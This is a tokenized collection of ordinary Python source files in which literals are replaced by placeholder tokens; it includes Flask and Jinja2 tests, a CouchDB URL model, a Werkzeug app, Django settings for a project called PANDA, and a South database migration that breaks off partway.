<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> import pytest <EOL> import flask <EOL> from flask . _compat import PY2 <EOL> def test_explicit_instance_paths ( modules_tmpdir ) : <EOL> with pytest . raises ( ValueError ) as excinfo : <EOL> flask . Flask ( __name__ , instance_path = '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in str ( excinfo . value ) <EOL> app = flask . Flask ( __name__ , instance_path = str ( modules_tmpdir ) ) <EOL> assert app . instance_path == str ( modules_tmpdir ) <EOL> def test_main_module_paths ( modules_tmpdir , purge_module ) : <EOL> app = modules_tmpdir . join ( '<STR_LIT>' ) <EOL> app . write ( '<STR_LIT>' ) <EOL> purge_module ( '<STR_LIT>' ) <EOL> from main_app import app <EOL> here = os . path . abspath ( os . getcwd ( ) ) <EOL> assert app . instance_path == os . path . join ( here , '<STR_LIT>' ) <EOL> def test_uninstalled_module_paths ( modules_tmpdir , purge_module ) : <EOL> app = modules_tmpdir . join ( '<STR_LIT>' ) . write ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> purge_module ( '<STR_LIT>' ) <EOL> from config_module_app import app <EOL> assert app . instance_path == str ( modules_tmpdir . join ( '<STR_LIT>' ) ) <EOL> def test_uninstalled_package_paths ( modules_tmpdir , purge_module ) : <EOL> app = modules_tmpdir . mkdir ( '<STR_LIT>' ) <EOL> init = app . join ( '<STR_LIT>' ) <EOL> init . write ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> purge_module ( '<STR_LIT>' ) <EOL> from config_package_app import app <EOL> assert app . instance_path == str ( modules_tmpdir . join ( '<STR_LIT>' ) ) <EOL> def test_installed_module_paths ( modules_tmpdir , modules_tmpdir_prefix , <EOL> purge_module , site_packages , limit_loader ) : <EOL> site_packages . join ( '<STR_LIT>' ) . write ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> purge_module ( '<STR_LIT>' ) <EOL> from site_app import app <EOL> assert app . instance_path == modules_tmpdir . 
join ( '<STR_LIT>' ) . join ( '<STR_LIT>' ) <EOL> def test_installed_package_paths ( limit_loader , modules_tmpdir , <EOL> modules_tmpdir_prefix , purge_module , <EOL> monkeypatch ) : <EOL> installed_path = modules_tmpdir . mkdir ( '<STR_LIT:path>' ) <EOL> monkeypatch . syspath_prepend ( installed_path ) <EOL> app = installed_path . mkdir ( '<STR_LIT>' ) <EOL> init = app . join ( '<STR_LIT>' ) <EOL> init . write ( '<STR_LIT>' ) <EOL> purge_module ( '<STR_LIT>' ) <EOL> from installed_package import app <EOL> assert app . instance_path == modules_tmpdir . join ( '<STR_LIT>' ) . join ( '<STR_LIT>' ) <EOL> def test_prefix_package_paths ( limit_loader , modules_tmpdir , <EOL> modules_tmpdir_prefix , purge_module , <EOL> site_packages ) : <EOL> app = site_packages . mkdir ( '<STR_LIT>' ) <EOL> init = app . join ( '<STR_LIT>' ) <EOL> init . write ( '<STR_LIT>' ) <EOL> purge_module ( '<STR_LIT>' ) <EOL> import site_package <EOL> assert site_package . app . instance_path == modules_tmpdir . join ( '<STR_LIT>' ) . join ( '<STR_LIT>' ) <EOL> def test_egg_installed_paths ( install_egg , modules_tmpdir , <EOL> modules_tmpdir_prefix ) : <EOL> modules_tmpdir . mkdir ( '<STR_LIT>' ) . join ( '<STR_LIT>' ) . write ( <EOL> '<STR_LIT>' <EOL> ) <EOL> install_egg ( '<STR_LIT>' ) <EOL> try : <EOL> import site_egg <EOL> assert site_egg . app . instance_path == str ( modules_tmpdir . join ( '<STR_LIT>' ) . join ( '<STR_LIT>' ) ) <EOL> finally : <EOL> if '<STR_LIT>' in sys . modules : <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> @ pytest . mark . skipif ( not PY2 , reason = '<STR_LIT>' ) <EOL> def test_meta_path_loader_without_is_package ( request , modules_tmpdir ) : <EOL> app = modules_tmpdir . join ( '<STR_LIT>' ) <EOL> app . write ( '<STR_LIT>' ) <EOL> class Loader ( object ) : <EOL> def find_module ( self , name , path = None ) : <EOL> return self <EOL> sys . meta_path . append ( Loader ( ) ) <EOL> request . addfinalizer ( sys . meta_path . pop ) <EOL> with pytest . 
raises ( AttributeError ) : <EOL> import unimportable </s>
<s> """<STR_LIT>""" <EOL> import pytest <EOL> from jinja2 import Environment <EOL> from jinja2 . bccache import FileSystemBytecodeCache <EOL> from jinja2 . exceptions import TemplateNotFound <EOL> @ pytest . fixture <EOL> def env ( package_loader ) : <EOL> bytecode_cache = FileSystemBytecodeCache ( ) <EOL> return Environment ( <EOL> loader = package_loader , <EOL> bytecode_cache = bytecode_cache , <EOL> ) <EOL> @ pytest . mark . byte_code_cache <EOL> class TestByteCodeCache ( ) : <EOL> def test_simple ( self , env ) : <EOL> tmpl = env . get_template ( '<STR_LIT>' ) <EOL> assert tmpl . render ( ) . strip ( ) == '<STR_LIT>' <EOL> pytest . raises ( TemplateNotFound , env . get_template , '<STR_LIT>' ) </s>
<s> from datetime import datetime <EOL> from couchdb . schema import Document , TextField , BooleanField , DateTimeField <EOL> from couchy . utils import url_for , get_random_uid <EOL> class URL ( Document ) : <EOL> target = TextField ( ) <EOL> public = BooleanField ( ) <EOL> added = DateTimeField ( default = datetime . utcnow ( ) ) <EOL> shorty_id = TextField ( default = None ) <EOL> db = None <EOL> @ classmethod <EOL> def load ( self , id ) : <EOL> return super ( URL , self ) . load ( URL . db , id ) <EOL> @ classmethod <EOL> def query ( self , code ) : <EOL> return URL . db . query ( code ) <EOL> def store ( self ) : <EOL> if getattr ( self . _data , '<STR_LIT:id>' , None ) is None : <EOL> new_id = self . shorty_id if self . shorty_id else None <EOL> while <NUM_LIT:1> : <EOL> id = new_id if new_id else get_random_uid ( ) <EOL> docid = None <EOL> try : <EOL> docid = URL . db . resource . put ( content = self . _data , path = '<STR_LIT>' % str ( id ) ) [ '<STR_LIT:id>' ] <EOL> except : <EOL> continue <EOL> if docid : <EOL> break <EOL> self . _data = URL . db . get ( docid ) <EOL> else : <EOL> super ( URL , self ) . store ( URL . db ) <EOL> return self <EOL> @ property <EOL> def short_url ( self ) : <EOL> return url_for ( '<STR_LIT>' , uid = self . id , _external = True ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % self . id </s>
<s> """<STR_LIT>""" <EOL> from os import path <EOL> from sqlalchemy import create_engine <EOL> from werkzeug . wrappers import Request <EOL> from werkzeug . wsgi import ClosingIterator , SharedDataMiddleware <EOL> from werkzeug . exceptions import HTTPException , NotFound <EOL> from plnt . utils import local , local_manager , url_map , endpoints <EOL> from plnt . database import session , metadata <EOL> import plnt . views <EOL> SHARED_DATA = path . join ( path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> class Plnt ( object ) : <EOL> def __init__ ( self , database_uri ) : <EOL> self . database_engine = create_engine ( database_uri ) <EOL> self . _dispatch = local_manager . middleware ( self . dispatch_request ) <EOL> self . _dispatch = SharedDataMiddleware ( self . _dispatch , { <EOL> '<STR_LIT>' : SHARED_DATA <EOL> } ) <EOL> def init_database ( self ) : <EOL> metadata . create_all ( self . database_engine ) <EOL> def bind_to_context ( self ) : <EOL> local . application = self <EOL> def dispatch_request ( self , environ , start_response ) : <EOL> self . bind_to_context ( ) <EOL> local . request = request = Request ( environ , start_response ) <EOL> local . url_adapter = adapter = url_map . bind_to_environ ( environ ) <EOL> try : <EOL> endpoint , values = adapter . match ( request . path ) <EOL> response = endpoints [ endpoint ] ( request , ** values ) <EOL> except HTTPException , e : <EOL> response = e <EOL> return ClosingIterator ( response ( environ , start_response ) , <EOL> session . remove ) <EOL> def __call__ ( self , environ , start_response ) : <EOL> return self . _dispatch ( environ , start_response ) </s>
<s> VERSION = ( <NUM_LIT:0> , <NUM_LIT:5> , <NUM_LIT:0> , "<STR_LIT>" , <NUM_LIT:1> ) <EOL> def get_version ( ) : <EOL> if VERSION [ <NUM_LIT:3> ] == "<STR_LIT>" : <EOL> return "<STR_LIT>" % ( VERSION [ <NUM_LIT:0> ] , VERSION [ <NUM_LIT:1> ] , VERSION [ <NUM_LIT:2> ] ) <EOL> elif VERSION [ <NUM_LIT:3> ] == "<STR_LIT>" : <EOL> if VERSION [ <NUM_LIT:2> ] == <NUM_LIT:0> : <EOL> return "<STR_LIT>" % ( VERSION [ <NUM_LIT:0> ] , VERSION [ <NUM_LIT:1> ] , VERSION [ <NUM_LIT:3> ] , VERSION [ <NUM_LIT:4> ] ) <EOL> return "<STR_LIT>" % ( VERSION [ <NUM_LIT:0> ] , VERSION [ <NUM_LIT:1> ] , VERSION [ <NUM_LIT:2> ] , VERSION [ <NUM_LIT:3> ] , VERSION [ <NUM_LIT:4> ] ) <EOL> else : <EOL> return "<STR_LIT>" % ( VERSION [ <NUM_LIT:0> ] , VERSION [ <NUM_LIT:1> ] , VERSION [ <NUM_LIT:2> ] , VERSION [ <NUM_LIT:3> ] ) <EOL> __version__ = get_version ( ) </s>
<s> import datetime <EOL> import os <EOL> import django <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> SETTINGS = '<STR_LIT>' <EOL> DJANGO_ROOT = os . path . dirname ( os . path . realpath ( django . __file__ ) ) <EOL> SITE_ROOT = os . path . dirname ( os . path . dirname ( os . path . realpath ( __file__ ) ) ) <EOL> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> ADMINS = ( <EOL> ) <EOL> MANAGERS = ADMINS <EOL> LOGIN_URL = '<STR_LIT>' <EOL> LOGOUT_URL = '<STR_LIT>' <EOL> LOGIN_REDIRECT_URL = '<STR_LIT>' <EOL> SITE_ID = <NUM_LIT:1> <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:localhost>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_TZ = True <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = False <EOL> LOCALE_PATHS = ( os . path . join ( SITE_ROOT , '<STR_LIT>' ) , ) <EOL> STATIC_ROOT = os . path . join ( SITE_ROOT , '<STR_LIT>' ) <EOL> STATIC_URL = '<STR_LIT>' <EOL> ADMIN_MEDIA_PREFIX = '<STR_LIT>' <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MEDIA_ROOT = '<STR_LIT>' <EOL> EXPORT_ROOT = '<STR_LIT>' <EOL> SECRET_KEY = '<STR_LIT>' <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> TEMPLATE_CONTEXT_PROCESSORS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATE_DIRS = ( <EOL> os . path . 
join ( SITE_ROOT , '<STR_LIT>' ) <EOL> ) <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> SESSION_COOKIE_AGE = <NUM_LIT> <EOL> AUTH_PROFILE_MODULE = '<STR_LIT>' <EOL> COMPRESS_ENABLED = False <EOL> import djcelery <EOL> djcelery . setup_loader ( ) <EOL> BROKER_TRANSPORT = '<STR_LIT>' <EOL> BROKER_URL = '<STR_LIT>' % DATABASES [ '<STR_LIT:default>' ] <EOL> CELERY_RESULT_DBURI = '<STR_LIT>' % DATABASES [ '<STR_LIT:default>' ] <EOL> CELERYD_HIJACK_ROOT_LOGGER = False <EOL> CELERYD_CONCURRENCY = <NUM_LIT:1> <EOL> CELERY_IGNORE_RESULT = True <EOL> CELERY_STORE_ERRORS_EVEN_IF_IGNORED = True <EOL> CELERYBEAT_SCHEDULE_FILENAME = '<STR_LIT>' <EOL> from celery . schedules import crontab <EOL> CELERYBEAT_SCHEDULE = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : crontab ( minute = <NUM_LIT:0> , hour = <NUM_LIT:2> ) , <EOL> '<STR_LIT>' : { '<STR_LIT>' : False } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : crontab ( minute = <NUM_LIT:30> , hour = <NUM_LIT:2> ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : crontab ( minute = <NUM_LIT:0> , hour = <NUM_LIT:4> ) <EOL> } <EOL> } <EOL> SOUTH_TESTS_MIGRATE = False <EOL> import south . 
logger <EOL> LOGGING = { <EOL> '<STR_LIT:version>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT:filename>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> * <NUM_LIT> * <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT:filename>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> * <NUM_LIT> * <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT:default>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False <EOL> } <EOL> } <EOL> } <EOL> SOLR_ENDPOINT = '<STR_LIT>' <EOL> SOLR_DATA_CORE = '<STR_LIT:data>' <EOL> SOLR_DATASETS_CORE = '<STR_LIT>' <EOL> 
SOLR_DIRECTORY = '<STR_LIT>' <EOL> PANDA_VERSION = '<STR_LIT>' <EOL> PANDA_DEFAULT_SEARCH_GROUPS = <NUM_LIT:10> <EOL> PANDA_DEFAULT_SEARCH_ROWS_PER_GROUP = <NUM_LIT:5> <EOL> PANDA_DEFAULT_SEARCH_ROWS = <NUM_LIT:50> <EOL> PANDA_SNIFFER_MAX_SAMPLE_SIZE = <NUM_LIT> * <NUM_LIT:100> <EOL> PANDA_SAMPLE_DATA_ROWS = <NUM_LIT:5> <EOL> PANDA_SCHEMA_SAMPLE_ROWS = <NUM_LIT:100> <EOL> PANDA_ACTIVATION_PERIOD = datetime . timedelta ( days = <NUM_LIT:30> ) <EOL> PANDA_AVAILABLE_SPACE_WARN = <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT:2> <EOL> PANDA_AVAILABLE_SPACE_CRITICAL = <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT:1> <EOL> PANDA_NOTIFICATIONS_TO_SHOW = <NUM_LIT:50> <EOL> PANDA_UNCATEGORIZED_ID = <NUM_LIT:0> <EOL> PANDA_UNCATEGORIZED_SLUG = '<STR_LIT>' <EOL> PANDA_UNCATEGORIZED_NAME = _ ( '<STR_LIT>' ) <EOL> MOMENT_LANGUAGE_MAPPING = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> try : <EOL> from local_settings import * <EOL> except ImportError : <EOL> pass </s>
<s> from django . middleware . csrf import get_token <EOL> class CsrfCookieUsedMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def process_request ( self , request ) : <EOL> get_token ( request ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT:title>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , max_length = <NUM_LIT> ) , <EOL> keep_default = False ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT:title>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , max_length = <NUM_LIT> ) , <EOL> keep_default = False ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT:title>' , <EOL> self . gf ( '<STR_LIT>' ) ( default = '<STR_LIT>' , max_length = <NUM_LIT> ) , <EOL> keep_default = False ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT:title>' ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT:title>' ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT:title>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : 
{ '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : 
'<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:4>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> 